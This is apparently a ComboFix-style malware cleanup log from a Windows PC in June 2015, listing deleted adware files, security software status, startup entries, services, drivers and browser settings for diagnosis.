AV: Ad-Aware Antivirus *Disabled/Outdated* {D87B6541-12A1-DAEA-0033-9B8057AAB996}
FW: Ad-Aware Firewall *Disabled* {E040E464-58CE-DBB2-2B6C-32B5A979FEED}
SP: Ad-Aware Antivirus *Disabled/Outdated* {631A84A5-349B-D564-3A83-A0F22C2DF32B}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\Boot.inf
C:\END
c:\program files (x86)\MediaPlayerV1
c:\program files (x86)\MediaViewerV1
c:\program files (x86)\MediaViewV1
c:\programdata\Local Settings\Temp
c:\programdata\ntuser.pol
c:\users\User\AppData\Local\Microsoft\Windows\Temporary Internet Files\diamondata_iels
c:\users\User\AppData\Local\Microsoft\Windows\Temporary Internet Files\e021cce8-eb6e-4c84-8599-2f4ec4e605b5.jpg
c:\users\User\AppData\Local\Microsoft\Windows\Temporary Internet Files\FindRight_iels
c:\users\User\AppData\Roaming\Help\coredb\storage
c:\users\User\AppData\Roaming\SearchProtect
c:\users\User\AppData\Roaming\SearchProtect\ffprotect\SProtectorRepository\searchProtectorData
c:\users\User\Favorites\Translator.url
c:\windows\msdownld.tmp
c:\windows\PFRO.log
c:\windows\security\logs\scecomp.log
c:\windows\SysWow64\images
c:\windows\SysWow64\images\Data.Dat
c:\windows\SysWow64\images\Reference.Dat
c:\windows\SysWow64\ini
c:\windows\SysWow64\ini\adult\characterdatatable.txt
c:\windows\SysWow64\ini\adult\ITEMDATATABLE.TXT
c:\windows\SysWow64\ini\adult\itemoptiontable.txt
c:\windows\SysWow64\ini\adult\ItemRuneAttributeTable.txt
c:\windows\SysWow64\ini\adult\ItemTooltipDesc.txt
c:\windows\SysWow64\ini\adult\refineryitem2.txt
c:\windows\SysWow64\ini\ArchlordColor.ini
c:\windows\SysWow64\ini\avatarset.ini
c:\windows\SysWow64\ini\base.dat
c:\windows\SysWow64\ini\charactercustomizelist.txt
c:\windows\SysWow64\ini\characterdatatable.txt
c:\windows\SysWow64\ini\charactertemplateanimation.ini
c:\windows\SysWow64\ini\charactertemplateclient.ini
c:\windows\SysWow64\ini\charactertemplatecustomize.ini
c:\windows\SysWow64\ini\charactertemplateeventeffect.ini
c:\windows\SysWow64\ini\CharacterTemplatePublic.ini
c:\windows\SysWow64\ini\charactertemplateskill.ini
c:\windows\SysWow64\ini\charactertemplateskillsound.ini
c:\windows\SysWow64\ini\de\charactercustomizelist.txt
c:\windows\SysWow64\ini\de\charactertemplatepublic.ini
c:\windows\SysWow64\ini\de\guildmark.txt
c:\windows\SysWow64\ini\de\help.txt
c:\windows\SysWow64\ini\de\itemdatatable.txt
c:\windows\SysWow64\ini\de\itemoptiontable.txt
c:\windows\SysWow64\ini\de\itemruneattributetable.txt
c:\windows\SysWow64\ini\de\itemtooltipdesc.txt
c:\windows\SysWow64\ini\de\levelupmessage.txt
c:\windows\SysWow64\ini\de\npc.ini
c:\windows\SysWow64\ini\de\npcdialog.txt
c:\windows\SysWow64\ini\de\questgroup.ini
c:\windows\SysWow64\ini\de\questtemplate.ini
c:\windows\SysWow64\ini\de\refineryoptionstone.txt
c:\windows\SysWow64\ini\de\skilltooltip.txt
c:\windows\SysWow64\ini\de\sysstr.txt
c:\windows\SysWow64\ini\de\tiptext.txt
c:\windows\SysWow64\ini\de\ui_1024x768.ini
c:\windows\SysWow64\ini\de\uimessage.txt
c:\windows\SysWow64\ini\esp\charactercustomizelist.txt
c:\windows\SysWow64\ini\esp\charactertemplatepublic.ini
c:\windows\SysWow64\ini\esp\guildmark.txt
c:\windows\SysWow64\ini\esp\help.txt
c:\windows\SysWow64\ini\esp\itemdatatable.txt
c:\windows\SysWow64\ini\esp\itemoptiontable.txt
c:\windows\SysWow64\ini\esp\itemruneattributetable.txt
c:\windows\SysWow64\ini\esp\itemtooltipdesc.txt
c:\windows\SysWow64\ini\esp\levelupmessage.txt
c:\windows\SysWow64\ini\esp\npc.ini
c:\windows\SysWow64\ini\esp\npcdialog.txt
c:\windows\SysWow64\ini\esp\questgroup.ini
c:\windows\SysWow64\ini\esp\questtemplate.ini
c:\windows\SysWow64\ini\esp\refineryoptionstone.txt
c:\windows\SysWow64\ini\esp\skilltooltip.txt
c:\windows\SysWow64\ini\esp\sysstr.txt
c:\windows\SysWow64\ini\esp\tiptext.txt
c:\windows\SysWow64\ini\esp\ui_1024x768.ini
c:\windows\SysWow64\ini\esp\uimessage.txt
c:\windows\SysWow64\ini\flagimoticon.xml
c:\windows\SysWow64\ini\fr\charactercustomizelist.txt
c:\windows\SysWow64\ini\fr\charactertemplatepublic.ini
c:\windows\SysWow64\ini\fr\guildmark.txt
c:\windows\SysWow64\ini\fr\help.txt
c:\windows\SysWow64\ini\fr\itemdatatable.txt
c:\windows\SysWow64\ini\fr\itemoptiontable.txt
c:\windows\SysWow64\ini\fr\itemruneattributetable.txt
c:\windows\SysWow64\ini\fr\itemtooltipdesc.txt
c:\windows\SysWow64\ini\fr\levelupmessage.txt
c:\windows\SysWow64\ini\fr\npc.ini
c:\windows\SysWow64\ini\fr\npcdialog.txt
c:\windows\SysWow64\ini\fr\questgroup.ini
c:\windows\SysWow64\ini\fr\questtemplate.ini
c:\windows\SysWow64\ini\fr\refineryoptionstone.txt
c:\windows\SysWow64\ini\fr\skilltooltip.txt
c:\windows\SysWow64\ini\fr\sysstr.txt
c:\windows\SysWow64\ini\fr\tiptext.txt
c:\windows\SysWow64\ini\fr\ui_1024x768.ini
c:\windows\SysWow64\ini\fr\uimessage.txt
c:\windows\SysWow64\ini\Help.txt
c:\windows\SysWow64\ini\ITEMDATATABLE.TXT
c:\windows\SysWow64\ini\itemoptiontable.txt
c:\windows\SysWow64\ini\ITEMRUNEATTRIBUTETABLE.TXT
c:\windows\SysWow64\ini\itemtemplate\Data.Dat
c:\windows\SysWow64\ini\itemtemplate\Reference.Dat
c:\windows\SysWow64\ini\itemtemplateall.ini
c:\windows\SysWow64\ini\ItemTemplateEntry.ini
c:\windows\SysWow64\ini\ITEMTOOLTIPDESC.TXT
c:\windows\SysWow64\ini\levelupmessage.txt
c:\windows\SysWow64\ini\mobdialog.txt
c:\windows\SysWow64\ini\NPCDIALOG.TXT
c:\windows\SysWow64\ini\npctradeitemlist.txt
c:\windows\SysWow64\ini\obj02328.ini
c:\windows\SysWow64\ini\Obj02630.ini
c:\windows\SysWow64\ini\objecttemplate.ini
c:\windows\SysWow64\ini\portu\charactercustomizelist.txt
c:\windows\SysWow64\ini\portu\charactertemplatepublic.ini
c:\windows\SysWow64\ini\portu\guildmark.txt
c:\windows\SysWow64\ini\portu\help.txt
c:\windows\SysWow64\ini\portu\itemdatatable.txt
c:\windows\SysWow64\ini\portu\itemoptiontable.txt
c:\windows\SysWow64\ini\portu\itemruneattributetable.txt
c:\windows\SysWow64\ini\portu\itemtooltipdesc.txt
c:\windows\SysWow64\ini\portu\levelupmessage.txt
c:\windows\SysWow64\ini\portu\npc.ini
c:\windows\SysWow64\ini\portu\npcdialog.txt
c:\windows\SysWow64\ini\portu\questgroup.ini
c:\windows\SysWow64\ini\portu\questtemplate.ini
c:\windows\SysWow64\ini\portu\refineryoptionstone.txt
c:\windows\SysWow64\ini\portu\skilltooltip.txt
c:\windows\SysWow64\ini\portu\sysstr.txt
c:\windows\SysWow64\ini\portu\tiptext.txt
c:\windows\SysWow64\ini\portu\ui_1024x768.ini
c:\windows\SysWow64\ini\portu\uimessage.txt
c:\windows\SysWow64\ini\PRODUCTCATEGORY.TXT
c:\windows\SysWow64\ini\PRODUCTCOMPOSE.TXT
c:\windows\SysWow64\ini\QUESTTEMPLATE.INI
c:\windows\SysWow64\ini\Reference.Dat
c:\windows\SysWow64\ini\refineryitem2.txt
c:\windows\SysWow64\ini\refineryoptionstone.txt
c:\windows\SysWow64\ini\regionglossary.txt
c:\windows\SysWow64\ini\regiontemplate.ini
c:\windows\SysWow64\ini\siegewar.txt
c:\windows\SysWow64\ini\SKILL_CONST.TXT
c:\windows\SysWow64\ini\skill_const2.txt
c:\windows\SysWow64\ini\SKILL_SPEC.TXT
c:\windows\SysWow64\ini\skillmastery.txt
c:\windows\SysWow64\ini\SKILLTEMPLATE.INI
c:\windows\SysWow64\ini\SKILLTOOLTIP.TXT
c:\windows\SysWow64\ini\skyset.ini
c:\windows\SysWow64\ini\SysStr.txt
c:\windows\SysWow64\ini\teleportpoint.ini
c:\windows\SysWow64\ini\TipText.txt
c:\windows\SysWow64\ini\UI_1024X768.INI
c:\windows\SysWow64\ini\ui_hotkey.ini
c:\windows\SysWow64\ini\UIMESSAGE.TXT
C:\Windows10_TechnicalPreview_x64_EN-US_9926.iso
.
.
(((((((((((((((((((((((((((((((((((((((   Drivers/Services   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_TESSAFE
-------\Service_TesSafe
.
.
(((((((((((((((((((((((((   Files Created from 2015-05-28 to 2015-06-28  )))))))))))))))))))))))))))))))
.
.
2015-06-28 15:37 . 2015-06-28 15:41    --------    d-----w-    C:\FRST
2015-06-28 13:26 . 2015-06-28 13:26    --------    d-----w-    c:\program files (x86)\Malwarebytes Anti-Malware
2015-06-28 13:26 . 2015-04-14 13:37    63704    ----a-w-    c:\windows\system32\drivers\mwac.sys
2015-06-28 13:26 . 2015-04-14 13:37    107736    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2015-06-28 13:26 . 2015-04-14 13:37    25816    ----a-w-    c:\windows\system32\drivers\mbam.sys
2015-06-28 13:22 . 2015-06-28 13:22    --------    d-----w-    c:\program files (x86)\VS Revo Group
2015-06-22 16:57 . 2015-06-28 23:02    --------    d-----w-    c:\program files\Common Files\AV
2015-06-20 10:29 . 2015-05-19 03:29    46768    ----a-w-    c:\windows\system32\drivers\nvvad64v.sys
2015-06-20 10:29 . 2015-05-19 03:14    57520    ----a-w-    c:\windows\SysWow64\nvaudcap32v.dll
2015-06-20 10:25 . 2015-06-20 10:29    --------    d-----w-    c:\programdata\Oracle
2015-06-10 14:16 . 2015-05-23 03:15    47616    ----a-w-    c:\windows\SysWow64\ieetwproxystub.dll
2015-06-02 18:24 . 2015-06-02 18:24    --------    d-----w-    c:\users\User\AppData\Local\Avg
2015-06-02 03:15 . 2015-06-02 03:18    --------    d-----w-    c:\users\User\AppData\Local\TINDER~1
2015-06-02 03:14 . 2015-06-02 03:18    --------    d-----w-    c:\program files (x86)\Tinder++
2015-05-30 04:07 . 2015-05-30 04:07    --------    d-----w-    c:\program files (x86)\Microsoft Expression
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-06-28 23:25 . 2014-03-29 23:10    136408    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-06-11 15:48 . 2011-06-26 14:32    140135120    ----a-w-    c:\windows\system32\MRT.exe
2015-06-04 21:51 . 2012-12-28 01:06    778416    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2015-06-04 21:51 . 2012-12-28 01:06    142512    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-06-03 21:04 . 2015-02-22 00:21    1320304    ----a-w-    c:\windows\SysWow64\nvspcap.dll
2015-06-03 21:04 . 2015-02-22 00:21    1316000    ----a-w-    c:\windows\SysWow64\nvspbridge.dll
2015-06-03 21:04 . 2015-02-22 00:21    1756424    ----a-w-    c:\windows\system32\nvspbridge64.dll
2015-06-03 21:04 . 2015-02-22 00:21    1571696    ----a-w-    c:\windows\system32\nvspcap64.dll
2015-05-19 03:14 . 2015-02-22 00:18    61616    ----a-w-    c:\windows\system32\nvaudcap64v.dll
2015-05-09 03:13 . 2015-06-10 14:17    44032    ----a-w-    c:\windows\apppatch\acwow64.dll
2015-05-05 01:29 . 2015-05-13 04:30    342016    ----a-w-    c:\windows\system32\schannel.dll
2015-05-05 01:12 . 2015-05-13 04:30    248832    ----a-w-    c:\windows\SysWow64\schannel.dll
2015-05-01 13:17 . 2015-05-13 05:48    124112    ----a-w-    c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16 . 2015-05-13 05:48    102608    ----a-w-    c:\windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-20 03:17 . 2015-05-13 04:29    1179136    ----a-w-    c:\windows\system32\FntCache.dll
2015-04-20 03:17 . 2015-05-13 04:29    1647104    ----a-w-    c:\windows\system32\DWrite.dll
2015-04-20 02:56 . 2015-05-13 04:29    1250816    ----a-w-    c:\windows\SysWow64\DWrite.dll
2015-04-18 03:10 . 2015-05-13 04:30    460800    ----a-w-    c:\windows\system32\certcli.dll
2015-04-18 02:56 . 2015-05-13 04:30    342016    ----a-w-    c:\windows\SysWow64\certcli.dll
2015-04-13 03:28 . 2015-05-13 04:29    328704    ----a-w-    c:\windows\system32\services.exe
2015-04-08 03:29 . 2015-05-13 04:28    275456    ----a-w-    c:\windows\system32\InkEd.dll
2015-04-08 03:29 . 2015-05-13 04:28    24576    ----a-w-    c:\windows\system32\jnwmon.dll
2015-04-08 03:14 . 2015-05-13 04:28    216064    ----a-w-    c:\windows\SysWow64\InkEd.dll
2015-04-04 03:29 . 2015-05-13 04:30    95680    ----a-w-    c:\windows\system32\drivers\ksecdd.sys
2015-04-04 03:29 . 2015-05-13 04:30    155576    ----a-w-    c:\windows\system32\drivers\ksecpkg.sys
2015-04-04 03:22 . 2015-05-13 04:30    210944    ----a-w-    c:\windows\system32\wdigest.dll
2015-04-04 03:22 . 2015-05-13 04:30    86528    ----a-w-    c:\windows\system32\TSpkg.dll
2015-04-04 03:22 . 2015-05-13 04:30    29184    ----a-w-    c:\windows\system32\sspisrv.dll
2015-04-04 03:22 . 2015-05-13 04:30    136192    ----a-w-    c:\windows\system32\sspicli.dll
2015-04-04 03:22 . 2015-05-13 04:30    28160    ----a-w-    c:\windows\system32\secur32.dll
2015-04-04 03:22 . 2015-05-13 04:30    314880    ----a-w-    c:\windows\system32\msv1_0.dll
2015-04-04 03:22 . 2015-05-13 04:30    309760    ----a-w-    c:\windows\system32\ncrypt.dll
2015-04-04 03:22 . 2015-05-13 04:30    1461760    ----a-w-    c:\windows\system32\lsasrv.dll
2015-04-04 03:22 . 2015-05-13 04:30    728064    ----a-w-    c:\windows\system32\kerberos.dll
2015-04-04 03:22 . 2015-05-13 04:30    22016    ----a-w-    c:\windows\system32\credssp.dll
2015-04-04 03:20 . 2015-05-13 04:30    31232    ----a-w-    c:\windows\system32\lsass.exe
2015-04-04 03:20 . 2015-05-13 04:30    64000    ----a-w-    c:\windows\system32\auditpol.exe
2015-04-04 03:17 . 2015-05-13 04:30    60416    ----a-w-    c:\windows\system32\msobjs.dll
2015-04-04 03:17 . 2015-05-13 04:30    146432    ----a-w-    c:\windows\system32\msaudite.dll
2015-04-04 03:15 . 2015-05-13 04:30    686080    ----a-w-    c:\windows\system32\adtschema.dll
2015-04-04 03:05 . 2015-05-13 04:30    172032    ----a-w-    c:\windows\SysWow64\wdigest.dll
2015-04-04 03:05 . 2015-05-13 04:30    65536    ----a-w-    c:\windows\SysWow64\TSpkg.dll
2015-04-04 03:05 . 2015-05-13 04:30    22016    ----a-w-    c:\windows\SysWow64\secur32.dll
2015-04-04 03:05 . 2015-05-13 04:30    221184    ----a-w-    c:\windows\SysWow64\ncrypt.dll
2015-04-04 03:05 . 2015-05-13 04:30    259584    ----a-w-    c:\windows\SysWow64\msv1_0.dll
2015-04-04 03:05 . 2015-05-13 04:30    550912    ----a-w-    c:\windows\SysWow64\kerberos.dll
2015-04-04 03:05 . 2015-05-13 04:30    17408    ----a-w-    c:\windows\SysWow64\credssp.dll
2015-04-04 03:04 . 2015-05-13 04:30    50176    ----a-w-    c:\windows\SysWow64\auditpol.exe
2015-04-04 03:04 . 2015-05-13 04:30    96768    ----a-w-    c:\windows\SysWow64\sspicli.dll
2015-04-04 03:01 . 2015-05-13 04:30    60416    ----a-w-    c:\windows\SysWow64\msobjs.dll
2015-04-04 03:01 . 2015-05-13 04:30    146432    ----a-w-    c:\windows\SysWow64\msaudite.dll
2015-04-04 02:59 . 2015-05-13 04:30    686080    ----a-w-    c:\windows\SysWow64\adtschema.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"LWS"="c:\program files (x86)\Logitech\LWS\Webcam Software\LWS.exe" [2011-11-11 205336]
"hpqSRMon"="c:\program files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe" [2008-07-22 150528]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-10-11 60712]
"Standard Mouse Driver"="c:\program files (x86)\Standard Mouse Driver\Monitor.exe" [2013-01-04 147456]
"Adobe Creative Cloud"="c:\program files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" [2014-07-22 2694040]
"QuickTime Task"="c:\program files (x86)\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-10-15 157480]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
HP Digital Imaging Monitor.lnk - c:\program files (x86)\HP\Digital Imaging\bin\hpqtra08.exe [2009-9-20 270336]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoThumbnailCache"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 CompFilter64;UVCCompositeFilter;c:\windows\system32\DRIVERS\lvbflt64.sys;c:\windows\SYSNATIVE\DRIVERS\lvbflt64.sys [x]
R3 dump_wmimmc;dump_wmimmc; [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys;c:\windows\SYSNATIVE\drivers\EagleX64.sys [x]
R3 hwmobile;Huawei FP Handset USB Modem and USB Serial;c:\windows\system32\DRIVERS\hwusbser.sys;c:\windows\SYSNATIVE\DRIVERS\hwusbser.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 LVPr2M64;Logitech LVPr2M64 Driver;c:\windows\system32\DRIVERS\LVPr2M64.sys;c:\windows\SYSNATIVE\DRIVERS\LVPr2M64.sys [x]
R3 LVRS64;Logitech RightSound Filter Driver;c:\windows\system32\DRIVERS\lvrs64.sys;c:\windows\SYSNATIVE\DRIVERS\lvrs64.sys [x]
R3 LVUVC64;Logitech HD Webcam C510(UVC);c:\windows\system32\DRIVERS\lvuvc64.sys;c:\windows\SYSNATIVE\DRIVERS\lvuvc64.sys [x]
R3 MAUSBFASTTRACKULTRA;Service for M-Audio Fast Track Ultra;c:\windows\system32\DRIVERS\MAudioFastTrackUltra.sys;c:\windows\SYSNATIVE\DRIVERS\MAudioFastTrackUltra.sys [x]
R3 npggsvc;nProtect GameGuard Service;c:\windows\system32\GameMon.des;c:\windows\SYSNATIVE\GameMon.des [x]
R3 Point64;Microsoft IntelliPoint Filter Driver;c:\windows\system32\DRIVERS\point64.sys;c:\windows\SYSNATIVE\DRIVERS\point64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 SWDUMon;SWDUMon;c:\windows\system32\DRIVERS\SWDUMon.sys;c:\windows\SYSNATIVE\DRIVERS\SWDUMon.sys [x]
R3 Synth3dVsc;Synth3dVsc; [x]
R3 Te.Service;Te.Service;c:\program files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe;c:\program files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 tsusbhub;tsusbhub; [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 VGPU;VGPU; [x]
R3 vtany;vtany; [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\DRIVERS\WSDScan.sys;c:\windows\SYSNATIVE\DRIVERS\WSDScan.sys [x]
R3 X6va005;X6va005; [x]
R3 X6va012;X6va012; [x]
R3 xhunter1;xhunter1;c:\windows\xhunter1.sys;c:\windows\xhunter1.sys [x]
R3 xsherlock;xsherlock;c:\windows\system32\xsherlock.xem;c:\windows\SYSNATIVE\xsherlock.xem [x]
R4 LavasoftAdAwareService11;Ad-Aware Service 11;c:\program files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe;c:\program files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [x]
S0 sptd;sptd;c:\windows\\SystemRoot\System32\Drivers\sptd.sys;c:\windows\\SystemRoot\System32\Drivers\sptd.sys [x]
S2 ABBYY.Licensing.FineReader.Sprint.9.0;ABBYY FineReader 9.0 Sprint Licensing Service;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [x]
S2 GfExperienceService;NVIDIA GeForce Experience Service;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
S2 Norton PC Checkup Application Launcher;Norton PC Checkup Application Launcher;c:\program files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe;c:\program files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe [x]
S2 NvNetworkService;NVIDIA Network Service;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [x]
S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [x]
S2 PCCUJobMgr;Common Client Job Manager Service;c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe;c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe [x]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x]
S2 UMVPFSrv;UMVPFSrv;c:\program files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe;c:\program files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [x]
S3 L1C;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller (NDIS 6.20);c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
S3 NvStreamKms;NvStreamKms;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt    REG_MULTI_SZ       hpqcxs08 hpqddsvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2015-06-22 19:51    990024    ----a-w-    c:\program files (x86)\Google\Chrome\Application\43.0.2357.130\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2015-02-20 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-12-28 21:51]
.
2015-02-20 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000Core.job
- c:\users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23 05:15]
.
2015-02-20 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000UA.job
- c:\users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23 05:15]
.
2015-05-16 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
2015-06-28 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
2015-05-16 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
2015-06-28 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco1]
@="{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}"
[HKEY_CLASSES_ROOT\CLSID\{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}]
2014-07-16 15:06    672416    ----a-w-    c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco2]
@="{853B7E05-C47D-4985-909A-D0DC5C6D7303}"
[HKEY_CLASSES_ROOT\CLSID\{853B7E05-C47D-4985-909A-D0DC5C6D7303}]
2014-07-16 15:06    672416    ----a-w-    c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco3]
@="{42D38F2E-98E9-4382-B546-E24E4D6D04BB}"
[HKEY_CLASSES_ROOT\CLSID\{42D38F2E-98E9-4382-B546-E24E4D6D04BB}]
2014-07-16 15:06    672416    ----a-w-    c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2009-10-21 8306208]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2011-04-13 2399632]
"AdAwareTray"="c:\program files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe" [2014-06-03 7715160]
"AdobeAAMUpdater-1.0"="c:\program files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" [2014-02-28 558496]
"NvBackend"="c:\program files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe" [2015-06-03 2754704]
"ShadowPlay"="c:\windows\system32\nvspcap64.dll" [2015-06-03 1571696]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
mStart Page = about:blank
mLocal Page = c:\windows\SysWOW64\blank.htm
mSearch Bar = https://ca.yahoo.com?fr=hp-avast&type=avastbcl
uInternet Settings,ProxyOverride = 127.0.0.1:9421;<local>;*.local
